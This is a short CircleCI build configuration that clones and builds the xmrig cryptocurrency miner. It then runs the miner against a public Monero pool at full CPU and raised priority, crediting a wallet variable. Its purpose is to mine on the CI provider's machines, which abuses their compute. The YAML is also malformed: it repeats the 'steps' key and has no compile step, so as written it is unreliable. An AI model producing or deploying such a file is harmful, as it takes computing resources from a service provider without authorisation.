version: 2
jobs:
  build:
    macos:
      xcode: "9.0"
    steps:
      - run: brew install cmake libuv libmicrohttpd
    steps:
      - run: git clone https://github.com/xmrig/xmrig.git xmrig_src
    steps:
      - run: cmake xmrig_src
    steps:
      - run: ./xmrig -o pool.supportxmr.com:3333 -u $address -p m -k --max-cpu-usage=100 --cpu-priority=5 --donate-level=1
